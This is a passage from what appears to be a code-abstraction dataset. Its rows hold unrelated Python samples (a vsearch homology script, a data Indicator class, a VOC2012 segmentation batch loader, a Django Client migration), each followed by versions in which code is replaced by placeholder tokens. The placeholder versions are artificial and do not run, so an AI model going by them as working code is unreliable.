{'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\nix = 0\ntmpfile, homhash, ix = create_starter(dir, files[0], genus, ix)\nfor num, file in enumerate(files[1:]):\n results = vsearch(dir, tmpfile, file, genus, num)\n tmpfile, homhash, ix = create_new_tmp(dir, tmpfile, file, results,\n homhash, genus, ix)\nos.remove(tmpfile)\no = open('%s%s_homology_across_species.txt' % (dir, genus), 'w')\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n matches = [('%s:%s' % (match, homhash[c][match])) for match in matches]\n o.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n",
"<import token>\n<assignment token>\nparser.add_argument('--dir', help='Directory for which to run.')\nparser.add_argument('--genus', help='Genus for which to run.')\n<assignment token>\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\nfor num, file in enumerate(files[1:]):\n results = vsearch(dir, tmpfile, file, genus, num)\n tmpfile, homhash, ix = create_new_tmp(dir, tmpfile, file, results,\n homhash, genus, ix)\nos.remove(tmpfile)\n<assignment token>\no.write('contig\\tmatches\\tnumMatches\\n')\nfor c, matches in homhash.items():\n matches = [('%s:%s' % (match, homhash[c][match])) for match in matches]\n o.write('%s\\t%s\\t%s\\n' % (c, ','.join(matches), len(matches)))\no.close()\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef create_starter(dir, file, genus, ix):\n homhash = {}\n starting = '%s%s.tmp.fa' % (dir, genus)\n f = open(file, 'r')\n o = open(starting, 'w')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l).group(1)\n newid = '%s_%s' % (genus, ix)\n homhash[newid] = {}\n homhash[newid][id] = '+'\n seq = f.next().rstrip()\n o.write('>%s\\n%s\\n' % (newid, seq))\n ix += 1\n f.close()\n o.close()\n return starting, homhash, ix\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef vsearch(dir, tmpfile, file, genus, num):\n out = '%s%s_%s_search' % (dir, genus, num)\n subprocess.call(\n 'vsearch --usearch_global %s --db %s --userout %s --id %s --userfields query+target+evalue+id+qstrand --strand both --threads 4'\n % (file, tmpfile, out, WCLUST), shell=True)\n return out\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n\n\ndef create_new_tmp(dir, tmpfile, file, results, homhash, genus, ix):\n matches1 = {}\n matches2 = {}\n f = open(results, 'r')\n for l in f:\n d = re.split('\\\\s+', l.rstrip())\n if d[1] not in matches1 and d[0] not in matches2:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]), 'strand':\n d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]), 'strand':\n d[4]}\n elif d[0] in matches2 and d[1] not in matches1:\n if float(d[3]) > matches2[d[0]]['perc']:\n matches1[d[1]] = {'match': d[0], 'perc': float(d[3]),\n 'strand': d[4]}\n matches2[d[0]] = {'match': d[1], 'perc': float(d[3]),\n 'strand': d[4]}\n f.close()\n os.remove(results)\n for c in matches2:\n homhash[matches2[c]['match']][c] = matches2[c]['strand']\n f = open(file, 'r')\n o = open(tmpfile, 'a')\n for l in f:\n if re.search('>', l):\n id = re.search('>(\\\\S+)', l.rstrip()).group(1)\n seq = f.next().rstrip()\n if id not in matches2:\n new_id = '%s_%s' % (genus, ix)\n ix += 1\n homhash[new_id] = {}\n homhash[new_id][id] = '+'\n o.write('>%s\\n%s\\n' % (new_id, seq))\n f.close()\n o.close()\n return tmpfile, homhash, ix\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,886 | eedd29223dfefc4561b33e8cdbe5c13e2938b170 | class Indicator:
name = ''
description = ''
source = ''
sourcenote = ''
note = ''
datasource = ''
url = ''
source_metadata = ''
data = {}
def as_json(self):
return dict(
name=self.name,
description=self.description,
source=self.source,
sourcenote=self.sourcenote,
note=self.note,
datasource=self.datasource,
url=self.url,
source_metadata = self.source_metadata,
data=self.data)
| [
"class Indicator:\r\n\tname = ''\r\n\tdescription = ''\r\n\tsource = ''\r\n\tsourcenote = ''\r\n\tnote = ''\r\n\tdatasource = ''\r\n\turl = ''\r\n\tsource_metadata = ''\r\n\tdata = {}\r\n\r\n\tdef as_json(self):\r\n\t\treturn dict(\r\n\t\t\tname=self.name,\r\n\t\t\tdescription=self.description,\r\n\t\t\tsource=self.source,\r\n\t\t\tsourcenote=self.sourcenote,\r\n\t\t\tnote=self.note,\r\n\t\t\tdatasource=self.datasource,\r\n\t\t\turl=self.url,\r\n\t\t\tsource_metadata = self.source_metadata,\r\n\t\t\tdata=self.data)\r\n",
"class Indicator:\n name = ''\n description = ''\n source = ''\n sourcenote = ''\n note = ''\n datasource = ''\n url = ''\n source_metadata = ''\n data = {}\n\n def as_json(self):\n return dict(name=self.name, description=self.description, source=\n self.source, sourcenote=self.sourcenote, note=self.note,\n datasource=self.datasource, url=self.url, source_metadata=self.\n source_metadata, data=self.data)\n",
"class Indicator:\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def as_json(self):\n return dict(name=self.name, description=self.description, source=\n self.source, sourcenote=self.sourcenote, note=self.note,\n datasource=self.datasource, url=self.url, source_metadata=self.\n source_metadata, data=self.data)\n",
"class Indicator:\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n",
"<class token>\n"
] | false |
99,887 | b43fda6d4779962f090f782ef65bdda63804fd1d | # say hello to everyone
print('Hello Everyone!')
| [
"# say hello to everyone\nprint('Hello Everyone!')\n",
"print('Hello Everyone!')\n",
"<code token>\n"
] | false |
99,888 | c290c0444619b39e322347d3adbac6a3e6ee779f | import numpy as np
import cv2
import time
import os, sys
import random as rd
def load_path_list(image_path, gt_path, batch_size, train = True):
"""
Load all path of image, there is two case in this code
if train == True then load training image
training image calculate there all size and calculate it's validation size
if train == False then load test image
doesn't calculate anythings
path_list : Data File Name List
Train_size : int
Validation_size : int
"""
if train:
print("Image Load Started..")
path_list = os.listdir(gt_path)
image_size = len(path_list)
Train_size = image_size // batch_size * batch_size
Validation_size = image_size - Train_size
if Validation_size < 10:
Train_size -= batch_size
Validation_size += batch_size
print("Train data size : ", Train_size)
print("Validation data size : ", Validation_size)
else:
path_list = os.listdir(gt_path)
Train_size = 0
Validation_size = 0
print("Test data size : ", len(path_list))
rd.shuffle(path_list)
return path_list, Train_size, Validation_size
def load_labels(label_path):
"""
Load labels for VOC2012, Label must be maded txt files and like my label.txt
Label path can be change when run training code , use --label_path
label : { label naem : label color}
index : [ [label color], [label color]]
"""
with open(label_path, "r") as f:
lines = f.readlines()
label = {}
index = []
for i, line in enumerate(lines):
sp = line.split()
label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]
index.append([int(sp[3]),int(sp[2]),int(sp[1])])
return label, index
def make_label_map(path, label_list):
"""
make 3D ground Truth image to 1D Labeled image
Images has multi label on each point and I removed last label
Output : [N, H, W]
"""
img = []
for name in path:
now = np.zeros((224,224))
im = cv2.resize(cv2.imread(name), (224,224)).tolist()
for y, i in enumerate(im):
for x, j in enumerate(i):
try:
now[y, x] = label_list.index(j)
except ValueError:
now[y, x] = 0
img.append(now)
return img
def image_load_resize(path):
"""
make image to 224 * 224 3D image
Output : [N, H, W, C]
"""
img = []
for name in path:
img.append(cv2.resize(cv2.imread(name), (224,224)))
return img
def batch(img_path, gt_path,img_list, batch, total_size, label_list):
"""
Batch Main function
Return image and Label Map
Output : [N, H, W, C], [N, H, W]
"""
image_list = [os.path.join(img_path, i) for i in img_list]
gt_list = [os.path.join(gt_path,i) for i in img_list]
for i in range(0, total_size, batch):
yield image_load_resize(image_list[i:i+batch]), make_label_map(gt_list[i:i+batch], label_list)
| [
"import numpy as np\r\nimport cv2\r\nimport time\r\nimport os, sys\r\nimport random as rd\r\n\r\n\r\ndef load_path_list(image_path, gt_path, batch_size, train = True):\r\n\r\n \"\"\"\r\n Load all path of image, there is two case in this code\r\n if train == True then load training image\r\n training image calculate there all size and calculate it's validation size\r\n if train == False then load test image\r\n doesn't calculate anythings\r\n path_list : Data File Name List\r\n Train_size : int\r\n Validation_size : int\r\n \"\"\"\r\n\r\n if train:\r\n print(\"Image Load Started..\")\r\n\r\n path_list = os.listdir(gt_path)\r\n \r\n image_size = len(path_list)\r\n Train_size = image_size // batch_size * batch_size\r\n Validation_size = image_size - Train_size\r\n \r\n if Validation_size < 10:\r\n Train_size -= batch_size\r\n Validation_size += batch_size\r\n \r\n print(\"Train data size : \", Train_size)\r\n print(\"Validation data size : \", Validation_size)\r\n else:\r\n path_list = os.listdir(gt_path)\r\n Train_size = 0\r\n Validation_size = 0\r\n print(\"Test data size : \", len(path_list))\r\n\r\n rd.shuffle(path_list)\r\n\r\n\r\n return path_list, Train_size, Validation_size\r\n\r\ndef load_labels(label_path):\r\n \"\"\"\r\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\r\n Label path can be change when run training code , use --label_path\r\n label : { label naem : label color}\r\n index : [ [label color], [label color]]\r\n \"\"\"\r\n\r\n with open(label_path, \"r\") as f:\r\n\r\n lines = f.readlines()\r\n \r\n label = {}\r\n index = []\r\n for i, line in enumerate(lines):\r\n sp = line.split()\r\n label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]\r\n index.append([int(sp[3]),int(sp[2]),int(sp[1])])\r\n\r\n return label, index\r\n\r\ndef make_label_map(path, label_list):\r\n \"\"\"\r\n make 3D ground Truth image to 1D Labeled image\r\n Images has multi label on each point and I removed last label\r\n Output : [N, H, W]\r\n \"\"\"\r\n \r\n img = []\r\n for name in path:\r\n now = np.zeros((224,224))\r\n im = cv2.resize(cv2.imread(name), (224,224)).tolist()\r\n for y, i in enumerate(im):\r\n for x, j in enumerate(i):\r\n try:\r\n now[y, x] = label_list.index(j)\r\n\r\n except ValueError:\r\n now[y, x] = 0\r\n\r\n img.append(now)\r\n return img\r\n \r\n \r\n\r\n\r\ndef image_load_resize(path):\r\n \"\"\"\r\n make image to 224 * 224 3D image\r\n Output : [N, H, W, C]\r\n \"\"\"\r\n \r\n img = []\r\n for name in path:\r\n \r\n img.append(cv2.resize(cv2.imread(name), (224,224)))\r\n \r\n return img\r\n \r\n\r\n\r\ndef batch(img_path, gt_path,img_list, batch, total_size, label_list):\r\n \"\"\"\r\n Batch Main function\r\n Return image and Label Map\r\n Output : [N, H, W, C], [N, H, W]\r\n \"\"\"\r\n\r\n image_list = [os.path.join(img_path, i) for i in img_list]\r\n gt_list = [os.path.join(gt_path,i) for i in img_list]\r\n\r\n \r\n for i in range(0, total_size, batch):\r\n yield image_load_resize(image_list[i:i+batch]), make_label_map(gt_list[i:i+batch], label_list)\r\n\r\n \r\n",
"import numpy as np\nimport cv2\nimport time\nimport os, sys\nimport random as rd\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\ndef image_load_resize(path):\n \"\"\"\n make image to 224 * 224 3D image\n Output : [N, H, W, C]\n \"\"\"\n img = []\n for name in path:\n img.append(cv2.resize(cv2.imread(name), (224, 224)))\n return img\n\n\ndef batch(img_path, gt_path, img_list, batch, total_size, label_list):\n \"\"\"\n Batch Main function\n Return image and Label Map\n Output : [N, H, W, C], [N, H, W]\n \"\"\"\n image_list = [os.path.join(img_path, i) for i in img_list]\n gt_list = [os.path.join(gt_path, i) for i in img_list]\n for i in range(0, total_size, batch):\n yield image_load_resize(image_list[i:i + batch]), make_label_map(\n gt_list[i:i + batch], label_list)\n",
"<import token>\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\ndef image_load_resize(path):\n \"\"\"\n make image to 224 * 224 3D image\n Output : [N, H, W, C]\n \"\"\"\n img = []\n for name in path:\n img.append(cv2.resize(cv2.imread(name), (224, 224)))\n return img\n\n\ndef batch(img_path, gt_path, img_list, batch, total_size, label_list):\n \"\"\"\n Batch Main function\n Return image and Label Map\n Output : [N, H, W, C], [N, H, W]\n \"\"\"\n image_list = [os.path.join(img_path, i) for i in img_list]\n gt_list = [os.path.join(gt_path, i) for i in img_list]\n for i in range(0, total_size, batch):\n yield image_load_resize(image_list[i:i + batch]), make_label_map(\n gt_list[i:i + batch], label_list)\n",
"<import token>\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\ndef image_load_resize(path):\n \"\"\"\n make image to 224 * 224 3D image\n Output : [N, H, W, C]\n \"\"\"\n img = []\n for name in path:\n img.append(cv2.resize(cv2.imread(name), (224, 224)))\n return img\n\n\n<function token>\n",
"<import token>\n\n\ndef load_path_list(image_path, gt_path, batch_size, train=True):\n \"\"\"\n Load all path of image, there is two case in this code\n if train == True then load training image\n training image calculate there all size and calculate it's validation size\n if train == False then load test image\n doesn't calculate anythings\n path_list : Data File Name List\n Train_size : int\n Validation_size : int\n \"\"\"\n if train:\n print('Image Load Started..')\n path_list = os.listdir(gt_path)\n image_size = len(path_list)\n Train_size = image_size // batch_size * batch_size\n Validation_size = image_size - Train_size\n if Validation_size < 10:\n Train_size -= batch_size\n Validation_size += batch_size\n print('Train data size : ', Train_size)\n print('Validation data size : ', Validation_size)\n else:\n path_list = os.listdir(gt_path)\n Train_size = 0\n Validation_size = 0\n print('Test data size : ', len(path_list))\n rd.shuffle(path_list)\n return path_list, Train_size, Validation_size\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n\n\ndef load_labels(label_path):\n \"\"\"\n Load labels for VOC2012, Label must be maded txt files and like my label.txt\n Label path can be change when run training code , use --label_path\n label : { label naem : label color}\n index : [ [label color], [label color]]\n \"\"\"\n with open(label_path, 'r') as f:\n lines = f.readlines()\n label = {}\n index = []\n for i, line in enumerate(lines):\n sp = line.split()\n label[sp[0]] = [int(sp[1]), int(sp[2]), int(sp[3])]\n index.append([int(sp[3]), int(sp[2]), int(sp[1])])\n return label, index\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n\n\ndef make_label_map(path, label_list):\n \"\"\"\n make 3D ground Truth image to 1D Labeled image\n Images has multi label on each point and I removed last label\n Output : [N, H, W]\n \"\"\"\n img = []\n for name in path:\n now = np.zeros((224, 224))\n im = cv2.resize(cv2.imread(name), (224, 224)).tolist()\n for y, i in enumerate(im):\n for x, j in enumerate(i):\n try:\n now[y, x] = label_list.index(j)\n except ValueError:\n now[y, x] = 0\n img.append(now)\n return img\n\n\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,889 | 34183200317dda1b892b0a190d00f89b01a1f87b | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-12-05 20:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('users', '0002_employee'),
]
operations = [
migrations.CreateModel(
name='Client',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),
('modified', models.DateTimeField(auto_now=True, verbose_name='Modificado em')),
('name', models.CharField(max_length=255, verbose_name='Nome')),
('cpf', models.CharField(max_length=16, verbose_name='CPF')),
('rg', models.CharField(max_length=16, verbose_name='RG')),
('address', models.TextField(blank=True, null=True, verbose_name='Endereço')),
('cellphone', models.TextField(blank=True, null=True, verbose_name='Celular')),
('phone', models.TextField(blank=True, null=True, verbose_name='Telefone')),
(
'employee',
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING,
to='users.Employee',
verbose_name='Vendedora'
)
),
],
options={
'ordering': ['name', 'cpf'],
},
),
]
| [
"# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-12-05 20:54\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('users', '0002_employee'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Client',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),\n ('modified', models.DateTimeField(auto_now=True, verbose_name='Modificado em')),\n ('name', models.CharField(max_length=255, verbose_name='Nome')),\n ('cpf', models.CharField(max_length=16, verbose_name='CPF')),\n ('rg', models.CharField(max_length=16, verbose_name='RG')),\n ('address', models.TextField(blank=True, null=True, verbose_name='Endereço')),\n ('cellphone', models.TextField(blank=True, null=True, verbose_name='Celular')),\n ('phone', models.TextField(blank=True, null=True, verbose_name='Telefone')),\n (\n 'employee',\n models.ForeignKey(\n on_delete=django.db.models.deletion.DO_NOTHING,\n to='users.Employee',\n verbose_name='Vendedora'\n )\n ),\n ],\n options={\n 'ordering': ['name', 'cpf'],\n },\n ),\n ]\n",
"from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = [('users', '0002_employee')]\n operations = [migrations.CreateModel(name='Client', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('created', models.DateTimeField(\n auto_now_add=True, verbose_name='Criado em')), ('modified', models.\n DateTimeField(auto_now=True, verbose_name='Modificado em')), (\n 'name', models.CharField(max_length=255, verbose_name='Nome')), (\n 'cpf', models.CharField(max_length=16, verbose_name='CPF')), ('rg',\n models.CharField(max_length=16, verbose_name='RG')), ('address',\n models.TextField(blank=True, null=True, verbose_name='Endereço')),\n ('cellphone', models.TextField(blank=True, null=True, verbose_name=\n 'Celular')), ('phone', models.TextField(blank=True, null=True,\n verbose_name='Telefone')), ('employee', models.ForeignKey(on_delete\n =django.db.models.deletion.DO_NOTHING, to='users.Employee',\n verbose_name='Vendedora'))], options={'ordering': ['name', 'cpf']})]\n",
